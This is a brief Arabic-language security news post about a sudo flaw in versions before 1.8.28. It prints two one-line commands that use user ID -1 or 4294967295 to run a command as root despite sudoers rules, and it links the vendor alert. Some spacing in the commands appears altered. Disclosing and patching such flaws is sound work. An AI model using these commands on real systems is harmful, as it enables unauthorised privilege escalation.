الضعف في سودو

يسمح خطأ في sudo بتنفيذ أي ملف قابل للتنفيذ كجذر إذا كان / etc / sudoers يسمح بتنفيذه كمستخدمين آخرين ويحظر على الجذر.

استغلال الخطأ بسيط للغاية:

sudo -u # -1 id -u

أو:

sudo -u # 4294967295 id -u

الخطأ موجود في جميع إصدارات sudo قبل 1.8.28

تفاصيل:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html

https://www.sudo.ws/alerts/minus_1_uid.html

المصدر: linux.org.ru